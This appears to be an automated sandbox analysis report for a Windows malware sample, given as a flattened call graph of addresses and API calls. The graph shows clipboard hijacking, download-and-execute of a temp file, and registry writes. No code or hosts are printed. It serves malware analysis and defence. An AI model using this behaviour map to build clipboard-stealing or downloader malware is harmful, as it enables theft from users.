40fce9 64468 40fcfe 64467->64468 64494 410623 GetModuleHandleW 64468->64494 64470 40fd05 64470->64453 64471 40fd09 64470->64471 64472 40fd12 64471->64472 64495 42ff6c 28 API calls _Atexit 64471->64495 64496 410182 13 API calls 2 library calls 64472->64496 64475 40fd1a 64475->64461 64477 40fffc 64476->64477 64500 41077b IsProcessorFeaturePresent 64477->64500 64479 410008 64501 428827 10 API calls 3 library calls 64479->64501 64481 41000d 64482 410011 64481->64482 64502 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64481->64502 64482->64450 64484 41001a 64485 410028 64484->64485 64503 428850 8 API calls 3 library calls 64484->64503 64485->64450 64504 426830 64487->64504 64490 410613 64490->64467 64491->64459 64492->64465 64493->64463 64494->64470 64495->64472 64496->64475 64497->64453 64498->64456 64499->64460 64500->64479 64501->64481 64502->64484 64503->64482 64505 410600 GetStartupInfoW 64504->64505 64505->64490 64506 432785 64511 432553 64506->64511 64510 4327ad 64516 43257e 64511->64516 64513 432771 64530 42a59d 26 API calls _Deallocate 64513->64530 64515 4326d0 64515->64510 64523 43d01c 64515->64523 64519 4326c7 64516->64519 64526 43c8ce 170 API calls 2 library calls 64516->64526 64518 432711 64518->64519 64527 43c8ce 170 API calls 2 library calls 64518->64527 64519->64515 64529 42eac9 20 API calls __Wcrtomb 64519->64529 64521 432730 64521->64519 64528 43c8ce 170 API calls 2 library calls 64521->64528 64531 43c9f1 64523->64531 64525 43d037 64525->64510 64526->64518 64527->64521 64528->64519 64529->64513 64530->64515 64532 43c9fd ___scrt_is_nonwritable_in_current_image 64531->64532 64533 43ca0b 64532->64533 64536 43ca44 64532->64536 64549 42eac9 20 API calls __Wcrtomb 64533->64549 64535 43ca10 64550 42a59d 26 API calls _Deallocate 64535->64550 64542 43cfcb 64536->64542 64541 43ca1a __fread_nolock 64541->64525 64552 43f941 64542->64552 64545 43ca68 64551 43ca91 LeaveCriticalSection __wsopen_s 64545->64551 64549->64535 64550->64541 64551->64541 64553 43f964 64552->64553 64554 43f94d 64552->64554 64556 43f983 64553->64556 64557 43f96c 64553->64557 64629 42eac9 20 API calls __Wcrtomb 64554->64629 64633 434faa 10 API calls 2 library calls 64556->64633 64631 42eac9 20 API calls __Wcrtomb 64557->64631 64559 43f952 64630 42a59d 26 API calls _Deallocate 64559->64630 64561 43f971 64632 42a59d 26 API calls _Deallocate 64561->64632 64562 43f98a MultiByteToWideChar 64565 43f9b9 64562->64565 64566 43f9a9 GetLastError 64562->64566 64635 4336a7 21 API calls 3 library calls 64565->64635 64634 42ea93 20 API calls 3 library calls 64566->64634 64569 43cfe1 64569->64545 64576 43d03c 64569->64576 64570 43f9c1 64571 43f9e9 64570->64571 64572 43f9c8 MultiByteToWideChar 64570->64572 64573 43346a _free 20 API calls 64571->64573 64572->64571 64574 43f9dd GetLastError 64572->64574 64573->64569 64636 42ea93 20 API calls 3 library calls 64574->64636 64637 43cd9f 64576->64637 64579 43d087 64655 43977e 64579->64655 64580 43d06e 64669 42eab6 20 API calls __Wcrtomb 64580->64669 64583 43d08c 64584 43d095 64583->64584 64585 43d0ac 64583->64585 64671 42eab6 20 API calls __Wcrtomb 64584->64671 64668 43cd0a CreateFileW 64585->64668 64589 43d09a 64672 42eac9 20 API calls __Wcrtomb 64589->64672 64591 43d162 GetFileType 64592 43d16d GetLastError 64591->64592 64597 43d1b4 64591->64597 64675 42ea93 20 API calls 3 library calls 64592->64675 64593 43d137 GetLastError 64674 42ea93 20 API calls 3 library calls 64593->64674 64594 43d0e5 64594->64591 64594->64593 64673 43cd0a CreateFileW 64594->64673 64677 4396c7 21 API calls 3 library calls 64597->64677 64599 43d073 64670 42eac9 20 API calls __Wcrtomb 64599->64670 64600 43d17b CloseHandle 64600->64599 64603 43d1a4 64600->64603 64602 43d12a 64602->64591 64602->64593 64676 42eac9 20 API calls __Wcrtomb 64603->64676 64604 43d1d5 64606 43d221 64604->64606 64678 43cf1b 169 API calls 4 library calls 64604->64678 64611 43d24e 64606->64611 64679 43cabd 167 API calls 4 library calls 64606->64679 64607 43d1a9 64607->64599 64610 43d247 64610->64611 64612 43d25f 64610->64612 64680 4335cd 29 API calls 2 library calls 64611->64680 64614 43d009 64612->64614 64615 43d2dd CloseHandle 64612->64615 64623 43346a 64614->64623 64681 43cd0a CreateFileW 64615->64681 64617 43d308 64618 43d312 GetLastError 64617->64618 64622 43d257 64617->64622 64682 42ea93 20 API calls 3 library calls 64618->64682 64620 43d31e 64683 439890 21 API calls 3 library calls 64620->64683 64622->64614 64624 43349e _free 64623->64624 64625 433475 HeapFree 64623->64625 64624->64545 64625->64624 64626 43348a 64625->64626 64706 42eac9 20 API calls __Wcrtomb 64626->64706 64628 433490 GetLastError 64628->64624 64629->64559 64630->64569 64631->64561 64632->64569 64633->64562 64634->64569 64635->64570 64636->64571 64638 43cdc0 64637->64638 64639 43cdda 64637->64639 64638->64639 64691 42eac9 20 API calls __Wcrtomb 64638->64691 64684 43cd2f 64639->64684 64642 43cdcf 64692 42a59d 26 API calls _Deallocate 64642->64692 64644 43ce12 64645 43ce41 64644->64645 64693 42eac9 20 API calls __Wcrtomb 64644->64693 64652 43ce94 64645->64652 64695 42ffdf 26 API calls 2 library calls 64645->64695 64648 43ce8f 64650 43cf0e 64648->64650 64648->64652 64649 43ce36 64694 42a59d 26 API calls _Deallocate 64649->64694 64696 42a5ca 11 API calls _Atexit 64650->64696 64652->64579 64652->64580 64654 43cf1a 64656 43978a ___scrt_is_nonwritable_in_current_image 64655->64656 64699 42e3ed EnterCriticalSection 64656->64699 64658 4397d8 64700 439887 64658->64700 64660 4397b6 64703 43955d 21 API calls 3 library calls 64660->64703 64661 439791 64661->64658 64661->64660 64665 439824 EnterCriticalSection 64661->64665 64662 439801 __fread_nolock 64662->64583 64664 4397bb 64664->64658 64704 4396a4 EnterCriticalSection 64664->64704 64665->64658 64667 439831 LeaveCriticalSection 64665->64667 64667->64661 64668->64594 64669->64599 64670->64614 64671->64589 64672->64599 64673->64602 64674->64599 64675->64600 64676->64607 64677->64604 64678->64606 64679->64610 64680->64622 64681->64617 64682->64620 64683->64622 64687 43cd47 64684->64687 64685 43cd62 64685->64644 64687->64685 64697 42eac9 20 API calls __Wcrtomb 64687->64697 64688 43cd86 64698 42a59d 26 API calls _Deallocate 64688->64698 64690 43cd91 64690->64644 64691->64642 64692->64639 64693->64649 64694->64645 64695->64648 64696->64654 64697->64688 64698->64690 64699->64661 64705 42e435 LeaveCriticalSection 64700->64705 64702 43988e 64702->64662 64703->64664 64704->64658 64705->64702 64706->64628 64707 9f97a6 64708 9f97b5 64707->64708 64711 9f9f46 64708->64711 64717 9f9f61 64711->64717 64712 9f9f6a CreateToolhelp32Snapshot 64713 9f9f86 Module32First 64712->64713 64712->64717 64714 9f9f95 64713->64714 64716 9f97be 64713->64716 64718 9f9c05 64714->64718 64717->64712 64717->64713 64719 9f9c30 64718->64719 64720 9f9c79 64719->64720 64721 9f9c41 VirtualAlloc 64719->64721 64720->64720 64721->64720 64722 43410a 64723 434116 ___scrt_is_nonwritable_in_current_image 64722->64723 64724 434122 64723->64724 64725 434139 64723->64725 64756 42eac9 20 API calls __Wcrtomb 64724->64756 64735 42caff EnterCriticalSection 64725->64735 64728 434127 64757 42a59d 26 API calls _Deallocate 64728->64757 64729 434149 64736 434186 64729->64736 64732 434155 64758 43417c LeaveCriticalSection __fread_nolock 64732->64758 64733 434132 __fread_nolock 64735->64729 64737 434194 64736->64737 64738 4341ae 64736->64738 64769 42eac9 20 API calls __Wcrtomb 64737->64769 64759 432908 64738->64759 64741 434199 64770 42a59d 26 API calls _Deallocate 64741->64770 64742 4341b7 64766 4347d3 64742->64766 64746 4342bb 64748 4342c8 64746->64748 64752 43426e 64746->64752 64747 43423f 64750 43425c 64747->64750 64747->64752 64772 42eac9 20 API calls __Wcrtomb 64748->64772 64771 43449f 31 API calls 4 library calls 64750->64771 64753 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64752->64753 64773 43431b 30 API calls 2 library calls 64752->64773 64753->64732 64754 434266 64754->64753 64756->64728 64757->64733 64758->64733 64760 432914 64759->64760 64761 432929 64759->64761 64774 42eac9 20 API calls __Wcrtomb 64760->64774 64761->64742 64763 432919 64775 42a59d 26 API calls _Deallocate 64763->64775 64765 432924 64765->64742 64776 434650 64766->64776 64768 4341d3 64768->64746 64768->64747 64768->64753 64769->64741 64770->64753 64771->64754 64772->64753 64773->64753 64774->64763 64775->64765 64777 43465c ___scrt_is_nonwritable_in_current_image 64776->64777 64778 434664 64777->64778 64779 43467c 64777->64779 64811 42eab6 20 API calls __Wcrtomb 64778->64811 64780 434730 64779->64780 64785 4346b4 64779->64785 64816 42eab6 20 API calls __Wcrtomb 64780->64816 64783 434669 64812 42eac9 20 API calls __Wcrtomb 64783->64812 64784 434735 64817 42eac9 20 API calls __Wcrtomb 64784->64817 64801 4396a4 EnterCriticalSection 64785->64801 64789 434671 __fread_nolock 64789->64768 64790 43473d 64818 42a59d 26 API calls _Deallocate 64790->64818 64791 4346ba 64793 4346f3 64791->64793 64794 4346de 64791->64794 64802 434755 64793->64802 64813 42eac9 20 API calls __Wcrtomb 64794->64813 64797 4346e3 64814 42eab6 20 API calls __Wcrtomb 64797->64814 64798 4346ee 64815 434728 LeaveCriticalSection __wsopen_s 64798->64815 64801->64791 64819 439921 64802->64819 64804 434767 64805 434780 SetFilePointerEx 64804->64805 64806 43476f 64804->64806 64808 434774 64805->64808 64809 434798 GetLastError 64805->64809 64832 42eac9 20 API calls __Wcrtomb 64806->64832 64808->64798 64833 42ea93 20 API calls 3 library calls 64809->64833 64811->64783 64812->64789 64813->64797 64814->64798 64815->64789 64816->64784 64817->64790 64818->64789 64820 439943 64819->64820 64821 43992e 64819->64821 64825 439968 64820->64825 64836 42eab6 20 API calls __Wcrtomb 64820->64836 64834 42eab6 20 API calls __Wcrtomb 64821->64834 64824 439933 64835 42eac9 20 API calls __Wcrtomb 64824->64835 64825->64804 64826 439973 64837 42eac9 20 API calls __Wcrtomb 64826->64837 64829 43993b 64829->64804 64830 43997b 64838 42a59d 26 API calls _Deallocate 64830->64838 64832->64808 64833->64808 64834->64824 64835->64829 64836->64826 64837->64830 64838->64829 64839 4332de 64840 4332eb 64839->64840 64844 433303 64839->64844 64889 42eac9 20 API calls __Wcrtomb 64840->64889 64842 4332f0 64890 42a59d 26 API calls _Deallocate 64842->64890 64845 4332fb 64844->64845 64846 43335e 64844->64846 64891 434ccd 21 API calls 2 library calls 64844->64891 64848 432908 __fread_nolock 26 API calls 64846->64848 64849 433376 64848->64849 64859 432e16 64849->64859 64851 43337d 64851->64845 64852 432908 __fread_nolock 26 API calls 64851->64852 64853 4333a9 64852->64853 64853->64845 64854 432908 __fread_nolock 26 API calls 64853->64854 64855 4333b7 64854->64855 64855->64845 64856 432908 __fread_nolock 26 API calls 64855->64856 64857 4333c7 64856->64857 64858 432908 __fread_nolock 26 API calls 64857->64858 64858->64845 64860 432e22 ___scrt_is_nonwritable_in_current_image 64859->64860 64861 432e42 64860->64861 64862 432e2a 64860->64862 64863 432f08 64861->64863 64868 432e7b 64861->64868 64958 42eab6 20 API calls __Wcrtomb 64862->64958 64965 42eab6 20 API calls __Wcrtomb 64863->64965 64866 432e2f 64959 42eac9 20 API calls __Wcrtomb 64866->64959 64870 432e8a 64868->64870 64871 432e9f 64868->64871 64869 432f0d 64966 42eac9 20 API calls __Wcrtomb 64869->64966 64960 42eab6 20 API calls __Wcrtomb 64870->64960 64892 4396a4 EnterCriticalSection 64871->64892 64875 432e97 64967 42a59d 26 API calls _Deallocate 64875->64967 64876 432e8f 64961 42eac9 20 API calls __Wcrtomb 64876->64961 64877 432ea5 64880 432ec1 64877->64880 64881 432ed6 64877->64881 64878 432e37 __fread_nolock 64878->64851 64962 42eac9 20 API calls __Wcrtomb 64880->64962 64893 432f29 64881->64893 64885 432ec6 64963 42eab6 20 API calls __Wcrtomb 64885->64963 64886 432ed1 64964 432f00 LeaveCriticalSection __wsopen_s 64886->64964 64889->64842 64890->64845 64891->64846 64892->64877 64894 432f3b 64893->64894 64899 432f53 64893->64899 64977 42eab6 20 API calls __Wcrtomb 64894->64977 64896 4332bd 64995 42eab6 20 API calls __Wcrtomb 64896->64995 64897 432f40 64978 42eac9 20 API calls __Wcrtomb 64897->64978 64899->64896 64902 432f98 64899->64902 64901 4332c2 64996 42eac9 20 API calls __Wcrtomb 64901->64996 64904 432fa3 64902->64904 64907 432f48 64902->64907 64909 432fd3 64902->64909 64979 42eab6 20 API calls __Wcrtomb 64904->64979 64905 432fb0 64997 42a59d 26 API calls _Deallocate 64905->64997 64907->64886 64908 432fa8 64980 42eac9 20 API calls __Wcrtomb 64908->64980 64912 432fec 64909->64912 64913 433012 64909->64913 64914 43302e 64909->64914 64912->64913 64918 432ff9 64912->64918 64981 42eab6 20 API calls __Wcrtomb 64913->64981 64984 4336a7 21 API calls 3 library calls 64914->64984 64917 433017 64982 42eac9 20 API calls __Wcrtomb 64917->64982 64968 43d365 64918->64968 64919 433045 64922 43346a _free 20 API calls 64919->64922 64925 43304e 64922->64925 64923 43301e 64983 42a59d 26 API calls _Deallocate 64923->64983 64924 433197 64927 43320d 64924->64927 64930 4331b0 GetConsoleMode 64924->64930 64928 43346a _free 20 API calls 64925->64928 64929 433211 ReadFile 64927->64929 64931 433055 64928->64931 64932 433285 GetLastError 64929->64932 64933 43322b 64929->64933 64930->64927 64934 4331c1 64930->64934 64935 43307a 64931->64935 64936 43305f 64931->64936 64937 433292 64932->64937 64938 4331e9 64932->64938 64933->64932 64939 433202 64933->64939 64934->64929 64940 4331c7 ReadConsoleW 64934->64940 64987 4347ee 64935->64987 64985 42eac9 20 API calls __Wcrtomb 64936->64985 64993 42eac9 20 API calls __Wcrtomb 64937->64993 64955 433029 __fread_nolock 64938->64955 64990 42ea93 20 API calls 3 library calls 64938->64990 64951 433250 64939->64951 64952 433267 64939->64952 64939->64955 64940->64939 64945 4331e3 GetLastError 64940->64945 64941 43346a _free 20 API calls 64941->64907 64945->64938 64947 433064 64986 42eab6 20 API calls __Wcrtomb 64947->64986 64948 433297 64994 42eab6 20 API calls __Wcrtomb 64948->64994 64991 432c45 31 API calls 3 library calls 64951->64991 64953 43327e 64952->64953 64952->64955 64992 432a85 29 API calls __fread_nolock 64953->64992 64955->64941 64957 433283 64957->64955 64958->64866 64959->64878 64960->64876 64961->64875 64962->64885 64963->64886 64964->64878 64965->64869 64966->64875 64967->64878 64969 43d372 64968->64969 64970 43d37f 64968->64970 64998 42eac9 20 API calls __Wcrtomb 64969->64998 64973 43d38b 64970->64973 64999 42eac9 20 API calls __Wcrtomb 64970->64999 64972 43d377 64972->64924 64973->64924 64975 43d3ac 65000 42a59d 26 API calls _Deallocate 64975->65000 64977->64897 64978->64907 64979->64908 64980->64905 64981->64917 64982->64923 64983->64955 64984->64919 64985->64947 64986->64955 64988 434755 __fread_nolock 28 API calls 64987->64988 64989 434804 64988->64989 64989->64918 64990->64955 64991->64955 64992->64957 64993->64948 64994->64955 64995->64901 64996->64905 64997->64907 64998->64972 64999->64975 65000->64972 65001 402bad RegCreateKeyExW 65002 402bdb RegSetValueExW 65001->65002 65003 402bef 65001->65003 65002->65003 65004 402bf4 RegCloseKey 65003->65004 65005 402bfd 65003->65005 65004->65005 65006 404b8e 65007 404b9a SafeSQueue 65006->65007 65012 40fb0c 65007->65012 65011 404bba Concurrency::details::SchedulerBase::Cleanup SafeSQueue 65014 40fb11 65012->65014 65015 404ba3 65014->65015 65017 40fb2d Concurrency::details::_CancellationTokenState::_RegisterCallback 65014->65017 65036 42ad7e 65014->65036 65043 42f450 7 API calls 2 library calls 65014->65043 65020 4051d0 65015->65020 65044 42860d RaiseException 65017->65044 65019 4103cc 65021 4051dc SafeSQueue __Cnd_init 65020->65021 65023 4051f4 __Mtx_init 65021->65023 65055 40ce32 28 API calls std::_Throw_Cpp_error 65021->65055 65024 40521b 65023->65024 65056 40ce32 28 API calls std::_Throw_Cpp_error 65023->65056 65047 4010ea 65024->65047 65030 40526a 65031 40527f Concurrency::details::SchedulerBase::Cleanup 65030->65031 65058 401128 30 API calls 2 library calls 65030->65058 65059 401109 65031->65059 65035 4052a4 SafeSQueue 65035->65011 65038 4336a7 std::_Locinfo::_Locinfo_dtor 65036->65038 65037 4336e5 65046 42eac9 20 API calls __Wcrtomb 65037->65046 65038->65037 65039 4336d0 RtlAllocateHeap 65038->65039 65045 42f450 7 API calls 2 library calls 65038->65045 65039->65038 65041 4336e3 65039->65041 65041->65014 65043->65014 65044->65019 65045->65038 65046->65041 65063 40d313 65047->65063 65050 401103 65052 40cef3 65050->65052 65087 42e114 65052->65087 65055->65023 65056->65024 65057 40ce32 28 API calls std::_Throw_Cpp_error 65057->65030 65058->65030 65060 401115 __Mtx_unlock 65059->65060 65061 401122 65060->65061 65412 40ce32 28 API calls std::_Throw_Cpp_error 65060->65412 65061->65035 65067 40d06d 65063->65067 65066 40ce32 28 API calls std::_Throw_Cpp_error 65066->65050 65068 40d0c3 65067->65068 65069 40d095 GetCurrentThreadId 65067->65069 65070 40d0c7 GetCurrentThreadId 65068->65070 65071 40d0ed 65068->65071 65072 40d0a0 GetCurrentThreadId 65069->65072 65082 40d0bb 65069->65082 65074 40d0d6 65070->65074 65073 40d186 GetCurrentThreadId 65071->65073 65077 40d10d 65071->65077 65072->65082 65073->65074 65075 40d1dd GetCurrentThreadId 65074->65075 65074->65082 65075->65082 65076 40f8cf __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 65078 4010f6 65076->65078 65085 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65077->65085 65078->65050 65078->65066 65081 40d145 GetCurrentThreadId 65081->65074 65083 40d118 __Xtime_diff_to_millis2 65081->65083 65082->65076 65083->65074 65083->65081 65083->65082 65086 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65083->65086 65085->65083 65086->65083 65088 42e121 65087->65088 65089 42e135 65087->65089 65110 42eac9 20 API calls __Wcrtomb 65088->65110 65101 42e0cb 65089->65101 65093 42e126 65111 42a59d 26 API calls _Deallocate 65093->65111 65095 42e14a CreateThread 65097 42e175 65095->65097 65098 42e169 GetLastError 65095->65098 65132 42dfc0 65095->65132 65096 405257 65096->65030 65096->65057 65113 42e03d 65097->65113 65112 42ea93 20 API calls 3 library calls 65098->65112 65121 434d2a 65101->65121 65104 43346a _free 20 API calls 65105 42e0e4 65104->65105 65106 42e103 65105->65106 65107 42e0eb GetModuleHandleExW 65105->65107 65108 42e03d __Thrd_start 22 API calls 65106->65108 65107->65106 65109 42e10d 65108->65109 65109->65095 65109->65097 65110->65093 65111->65096 65112->65097 65114 42e04a 65113->65114 65120 42e06e 65113->65120 65115 42e050 CloseHandle 65114->65115 65116 42e059 65114->65116 65115->65116 65117 42e068 65116->65117 65118 42e05f FreeLibrary 65116->65118 65119 43346a _free 20 API calls 65117->65119 65118->65117 65119->65120 65120->65096 65122 434d37 65121->65122 65123 434d77 65122->65123 65124 434d62 HeapAlloc 65122->65124 65128 434d4b std::_Locinfo::_Locinfo_dtor 65122->65128 65131 42eac9 20 API calls __Wcrtomb 65123->65131 65125 434d75 65124->65125 65124->65128 65127 42e0db 65125->65127 65127->65104 65128->65123 65128->65124 65130 42f450 7 API calls 2 library calls 65128->65130 65130->65128 65131->65127 65133 42dfcc _Atexit 65132->65133 65134 42dfd3 GetLastError ExitThread 65133->65134 65135 42dfe0 65133->65135 65148 431eda GetLastError 65135->65148 65137 42dfe5 65168 435571 65137->65168 65140 42dffb 65175 401169 65140->65175 65149 431ef0 65148->65149 65150 431ef6 65148->65150 65183 435111 11 API calls 2 library calls 65149->65183 65152 434d2a __Thrd_start 20 API calls 65150->65152 65154 431f45 SetLastError 65150->65154 65153 431f08 65152->65153 65155 431f10 65153->65155 65184 435167 11 API calls 2 library calls 65153->65184 65154->65137 65157 43346a _free 20 API calls 65155->65157 65159 431f16 65157->65159 65158 431f25 65158->65155 65160 431f2c 65158->65160 65162 431f51 SetLastError 65159->65162 65185 431d4c 20 API calls __Wcrtomb 65160->65185 65186 42df7d 167 API calls 2 library calls 65162->65186 65163 431f37 65165 43346a _free 20 API calls 65163->65165 65167 431f3e 65165->65167 65166 431f5d 65167->65154 65167->65162 65169 435596 65168->65169 65170 43558c 65168->65170 65187 434e93 5 API calls 2 library calls 65169->65187 65172 40f8cf __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 65170->65172 65173 42dff0 65172->65173 65173->65140 65182 4354a4 10 API calls 2 library calls 65173->65182 65174 4355ad 65174->65170 65188 405800 65175->65188 65201 40155a Sleep 65175->65201 65176 401173 65179 42e199 65176->65179 65380 42e074 65179->65380 65181 42e1a6 65182->65140 65183->65150 65184->65158 65185->65163 65186->65166 65187->65174 65189 40580c SafeSQueue 65188->65189 65190 4010ea std::_Cnd_initX 35 API calls 65189->65190 65191 405821 __Cnd_signal 65190->65191 65192 405839 65191->65192 65247 40ce32 28 API calls std::_Throw_Cpp_error 65191->65247 65194 401109 std::_Cnd_initX 28 API calls 65192->65194 65195 405842 65194->65195 65203 4016df 65195->65203 65224 4029f4 InternetOpenW 65195->65224 65198 405849 Concurrency::details::SchedulerBase::Cleanup SafeSQueue 65198->65176 65202 4016d5 65201->65202 65248 40fde6 65203->65248 65205 4016eb Sleep 65249 40cc10 65205->65249 65208 40cc10 28 API calls 65209 401711 65208->65209 65210 40171b OpenClipboard 65209->65210 65211 401943 Sleep 65210->65211 65212 40172b GetClipboardData 65210->65212 65211->65210 65213 40173b GlobalLock 65212->65213 65214 40193d CloseClipboard 65212->65214 65213->65214 65218 401748 _strlen 65213->65218 65214->65211 65215 40cbc7 28 API calls std::system_error::system_error 65215->65218 65216 40cc10 28 API calls 65216->65218 65218->65214 65218->65215 65218->65216 65219 4018d2 EmptyClipboard GlobalAlloc 65218->65219 65253 402e66 167 API calls 2 library calls 65218->65253 65255 40caa6 26 API calls _Deallocate 65218->65255 65219->65218 65220 4018eb GlobalLock 65219->65220 65254 426990 65220->65254 65223 401905 GlobalUnlock SetClipboardData GlobalFree 65223->65218 65225 402a27 InternetOpenUrlW 65224->65225 65226 402b9c 65224->65226 65225->65226 65227 402a3d GetTempPathW GetTempFileNameW 65225->65227 65229 40f8cf __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 65226->65229 65261 42a88e 65227->65261 65231 402bab 65229->65231 65240 40e76b 65231->65240 65232 402b8b InternetCloseHandle InternetCloseHandle 65232->65226 65233 402aa8 StructuredWorkStealingQueue 65234 402ac0 InternetReadFile WriteFile 65233->65234 65235 402b00 CloseHandle 65233->65235 65234->65233 65263 402960 65235->65263 65238 402b2b ShellExecuteExW 65238->65232 65239 402b72 WaitForSingleObject CloseHandle 65238->65239 65239->65232 65371 40deea 65240->65371 65245 40e810 65245->65198 65246 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65378 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65246->65378 65247->65192 65248->65205 65250 40cc2c _strlen 65249->65250 65256 40cbc7 65250->65256 65252 401704 65252->65208 65253->65218 65254->65223 65255->65218 65257 40cbfa 65256->65257 65259 40cbd6 BuildCatchObjectHelperInternal 65256->65259 65257->65259 65260 40cb5c 28 API calls 4 library calls 65257->65260 65259->65252 65260->65259 65262 402a76 CreateFileW 65261->65262 65262->65232 65262->65233 65264 40298b StructuredWorkStealingQueue _wcslen 65263->65264 65273 42b454 65264->65273 65268 4029b8 65295 404333 65268->65295 65271 40f8cf __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 65272 4029f2 65271->65272 65272->65232 65272->65238 65299 42b106 65273->65299 65276 402823 65277 402832 SafeSQueue 65276->65277 65325 4032dd 65277->65325 65279 402846 65341 403b8b 65279->65341 65281 40285a 65282 402888 65281->65282 65283 40286c 65281->65283 65347 403112 65282->65347 65368 40329a 167 API calls 65283->65368 65286 402895 65350 403c20 65286->65350 65288 4028a7 65360 403cc2 65288->65360 65290 40287f std::ios_base::_Ios_base_dtor SafeSQueue 65290->65268 65291 4028c4 65292 404333 26 API calls 65291->65292 65293 4028e3 65292->65293 65369 40329a 167 API calls 65293->65369 65296 4029e4 65295->65296 65297 40433b 65295->65297 65296->65271 65370 40cc96 26 API calls 2 library calls 65297->65370 65300 42b133 65299->65300 65301 42b142 65300->65301 65302 42b15a 65300->65302 65314 42b137 65300->65314 65303 42eac9 __Wcrtomb 20 API calls 65301->65303 65304 42a747 __fassign 162 API calls 65302->65304 65305 42b147 65303->65305 65307 42b165 65304->65307 65308 42a59d pre_c_initialization 26 API calls 65305->65308 65306 40f8cf __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 65309 4029a4 65306->65309 65310 42b170 65307->65310 65311 42b307 65307->65311 65308->65314 65309->65276 65313 42b218 WideCharToMultiByte 65310->65313 65317 42b17b 65310->65317 65322 42b1b5 WideCharToMultiByte 65310->65322 65312 42b334 WideCharToMultiByte 65311->65312 65315 42b312 65311->65315 65312->65315 65313->65317 65318 42b243 65313->65318 65314->65306 65315->65314 65319 42eac9 __Wcrtomb 20 API calls 65315->65319 65317->65314 65321 42eac9 __Wcrtomb 20 API calls 65317->65321 65318->65317 65320 42b24c GetLastError 65318->65320 65319->65314 65320->65317 65324 42b25b 65320->65324 65321->65314 65322->65317 65323 42b274 WideCharToMultiByte 65323->65315 65323->65324 65324->65314 65324->65315 65324->65323 65326 4032e9 SafeSQueue 65325->65326 65327 40467c 167 API calls 65326->65327 65328 403315 65327->65328 65329 40484d 167 API calls 65328->65329 65330 40333e 65329->65330 65331 40458c 26 API calls 65330->65331 65332 40334d 65331->65332 65333 403392 std::ios_base::_Ios_base_dtor 65332->65333 65334 40dde3 167 API calls 65332->65334 65335 40c618 167 API calls 65333->65335 65336 4033ce SafeSQueue 65333->65336 65337 403362 65334->65337 65335->65336 65336->65279 65337->65333 65338 40458c 26 API calls 65337->65338 65339 403373 65338->65339 65340 404c14 167 API calls 65339->65340 65340->65333 65342 403b97 SafeSQueue 65341->65342 65343 4042af 167 API calls 65342->65343 65344 403ba3 65343->65344 65345 403bc7 SafeSQueue 65344->65345 65346 4034fb 167 API calls 65344->65346 65345->65281 65346->65345 65348 404356 28 API calls 65347->65348 65349 40312c StructuredWorkStealingQueue 65348->65349 65349->65286 65351 403c2c SafeSQueue 65350->65351 65352 40c618 167 API calls 65351->65352 65353 403c4f 65352->65353 65354 4042af 167 API calls 65353->65354 65355 403c59 65354->65355 65357 403c9c SafeSQueue 65355->65357 65359 4034fb 167 API calls 65355->65359 65356 403c7a 65356->65357 65358 4046ca 167 API calls 65356->65358 65357->65288 65358->65357 65359->65356 65361 403cce __EH_prolog3_catch 65360->65361 65362 4042af 167 API calls 65361->65362 65363 403ce7 65362->65363 65365 403d17 65363->65365 65367 40369f 40 API calls 65363->65367 65364 4046ca 167 API calls 65366 403d70 SafeSQueue 65364->65366 65365->65364 65366->65291 65367->65365 65368->65290 65369->65290 65370->65296 65379 40f22a EnterCriticalSection 65371->65379 65373 40def4 65374 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65373->65374 65375 40ced2 65374->65375 65376 40cec7 CloseHandle 65374->65376 65377 40ced6 GetCurrentThreadId 65375->65377 65376->65377 65377->65246 65378->65245 65379->65373 65389 431f5e GetLastError 65380->65389 65382 42e083 ExitThread 65383 42e0a1 65386 42e0ad CloseHandle 65383->65386 65387 42e0b4 65383->65387 65386->65387 65387->65382 65388 42e0c0 FreeLibraryAndExitThread 65387->65388 65390 431f7d 65389->65390 65391 431f77 65389->65391 65393 434d2a __Thrd_start 17 API calls 65390->65393 65395 431fd4 SetLastError 65390->65395 65409 435111 11 API calls 2 library calls 65391->65409 65394 431f8f 65393->65394 65402 431f97 65394->65402 65410 435167 11 API calls 2 library calls 65394->65410 65396 42e07f 65395->65396 65396->65382 65396->65383 65408 4354f6 10 API calls 2 library calls 65396->65408 65398 43346a _free 17 API calls 65400 431f9d 65398->65400 65399 431fac 65401 431fb3 65399->65401 65399->65402 65403 431fcb SetLastError 65400->65403 65411 431d4c 20 API calls __Wcrtomb 65401->65411 65402->65398 65403->65396 65405 431fbe 65406 43346a _free 17 API calls 65405->65406 65407 431fc4 65406->65407 65407->65395 65407->65403 65408->65383 65409->65390 65410->65399 65411->65405 65412->65061 65413 40239e 65414 402561 PostQuitMessage 65413->65414 65415 4023b2 65413->65415 65416 40255f 65414->65416 65417 4023b9 DefWindowProcW 65415->65417 65418 4023d0 65415->65418 65417->65416 65418->65416 65419 4029f4 167 API calls 65418->65419 65419->65416

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
